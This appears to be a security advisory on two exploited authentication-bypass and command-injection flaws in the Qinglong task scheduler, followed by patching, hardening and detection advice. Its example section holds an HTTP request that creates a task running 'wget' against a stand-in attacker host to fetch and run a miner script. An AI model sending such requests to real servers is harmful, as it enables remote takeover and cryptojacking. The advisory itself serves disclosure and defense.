# Critical RCE Vulnerabilities in Qinglong Task Scheduler Exposed to Cryptomining Attacks


Researchers have identified two critical authentication bypass vulnerabilities in Qinglong, a popular open-source task scheduling tool used by developers worldwide, that are actively being exploited to deploy cryptocurrency miners on compromised servers. The flaws allow unauthenticated attackers to execute arbitrary code remotely, effectively giving them complete control over affected systems.


## The Threat


Threat actors are actively exploiting these vulnerabilities in the wild, targeting Qinglong installations exposed to the internet without proper access controls. The primary objective appears to be deploying cryptocurrency miners that siphon computing resources from victim servers to generate revenue for attackers. In some cases, researchers have observed attackers using compromised infrastructure for secondary objectives, including data exfiltration and lateral movement within organizational networks.


The exploitation appears widespread based on honeypot data and incident reports, with attackers likely using automated scanning tools to identify vulnerable Qinglong instances. The ease of exploitation—requiring only unauthenticated HTTP requests—has accelerated adoption among less sophisticated threat groups.


## Background and Context


What is Qinglong?


Qinglong is an open-source task scheduling platform written in Node.js, designed to automate recurring tasks and provide centralized job management. It's particularly popular among developers in East Asian communities and has gained adoption globally for scenarios including:


  • Automated data collection and web scraping
  • System maintenance and backup scheduling
  • Integration with cloud services and APIs
  • Testing and monitoring workflows

    • The tool provides a web-based dashboard for configuration and monitoring, typically deployed on developer machines, VPS instances, or internal infrastructure. Many users expose Qinglong to the internet for remote management convenience—a practice that directly enables these attacks.


    ## Technical Details


    The Vulnerabilities


    Security researchers identified two critical flaws that, when combined, allow complete authentication bypass:


    | Vulnerability | Type | CVSS Score | Impact |

    |---|---|---|---|

    | API Endpoint Authentication Bypass | CWE-287 | 9.1 | Unauthenticated access to sensitive endpoints |

    | Command Injection in Task Creation | CWE-78 | 9.3 | Remote code execution via malicious task parameters |


    Attack Flow


    The exploitation chain follows a straightforward process:


    1. Discovery: Attackers identify Qinglong instances using port scanning and banner identification (typically running on ports 5700, 5701, or custom configurations)


    2. Authentication Bypass: The attacker sends a specially crafted HTTP request to unauthenticated API endpoints, bypassing token validation checks that should require login credentials


    3. Code Injection: Through vulnerable parameters in the task creation API, attackers inject shell commands or Node.js code that execute with the privileges of the Qinglong process


    4. Payload Delivery: The attacker creates a scheduled task that downloads and executes a cryptominer binary, or injects mining code directly into running processes


    5. Persistence: The malicious task is configured to restart automatically, ensuring the miner continues running even after system reboots


    Exploitation Example


    A typical attack might involve:


    POST /api/task HTTP/1.1
Host: target.com:5700
Content-Type: application/json

{
  "name": "system_update",
  "command": "wget http://attacker.com/miner.sh && bash miner.sh",
  "schedule": "* * * * *"
}

    The vulnerable endpoint accepts this request without authentication and executes the command through the underlying shell interpreter.


    ## Implications for Organizations


    Immediate Risks


  • Cryptomining Impact: Deployed miners consume 30-80% of CPU resources, degrading performance and increasing electricity costs
  • Infrastructure Compromise: Attackers gain root or near-root execution context on affected servers
  • Lateral Movement: Compromised systems can be used as pivot points for attacks against connected networks
  • Data Exposure: Attackers may access sensitive files, environment variables, and credentials stored on the system

    • Broader Business Impact


    Organizations using Qinglong face several operational consequences:


  • Performance Degradation: Applications relying on Qinglong may experience slowdowns or timeouts
  • Cloud Cost Increases: For cloud-hosted instances, the cryptomining workload directly translates to higher compute bills
  • Supply Chain Risk: Compromised systems may affect downstream customers or partners relying on services hosted on affected infrastructure
  • Compliance Violations: Unauthorized cryptomining may breach compliance requirements (GDPR, HIPAA, PCI-DSS)

    • ## Who Is Affected


    Qinglong users most at risk include:


  • Developers running instances on personal servers or VPS providers without firewalls
  • DevOps teams using Qinglong for infrastructure automation without network segmentation
  • Small organizations lacking dedicated security teams or network monitoring
  • Cloud users who may not realize their bill increases are due to unauthorized cryptocurrency mining

    • ## Recommendations


    Immediate Actions


    1. Audit Exposure: Scan your network for exposed Qinglong instances using tools like Shodan or internal vulnerability scanners. Search for port 5700 or custom Qinglong ports in your environment.


    2. Update Immediately: Upgrade to the latest patched version of Qinglong. Developers have released security updates addressing both vulnerabilities.


    3. Network Segmentation: Restrict access to Qinglong instances to specific IP addresses or internal networks only. Never expose the web interface directly to the internet.


    4. Review Logs: Check Qinglong logs for suspicious task creation requests, unusual command executions, or API access patterns indicating compromise.


    5. Monitor Processes: Look for unexpected cryptocurrency miner processes (xmrig, xmr-stak, monero-miner) running on systems with Qinglong instances.


    Long-Term Hardening


  • Implement Authentication: Use VPN, SSH tunneling, or reverse proxies (nginx with authentication) to add security layers in front of Qinglong
  • Resource Monitoring: Deploy system monitoring to alert on sudden CPU spikes or unexpected process execution
  • Principle of Least Privilege: Run Qinglong with the minimum required permissions, not as root
  • Regular Patching: Subscribe to Qinglong security notifications and maintain a consistent update schedule
  • Network Monitoring: Implement egress filtering to detect suspicious outbound connections attempting to reach cryptocurrency mining pools

    • Detection and Response


    If you suspect compromise:


  • Isolate the affected system from the network immediately
  • Capture system memory and logs for forensic analysis
  • Search for unauthorized scheduled tasks: crontab -l and Qinglong task database
  • Review recently modified files in the Qinglong installation directory
  • Check running processes for mining software: ps aux | grep -i miner
  • Rotate any credentials or API keys that may have been exposed

    • ## Conclusion


    The Qinglong vulnerabilities represent a serious risk to developers and organizations relying on this tool. The simplicity of exploitation and obvious financial motivation for attackers suggest active, ongoing campaigns. Organizations should prioritize patching and network segmentation immediately, while implementing monitoring to detect any potential compromises. As with most RCE vulnerabilities, the best defense remains a combination of rapid patching, network access controls, and behavioral monitoring for indicators of compromise.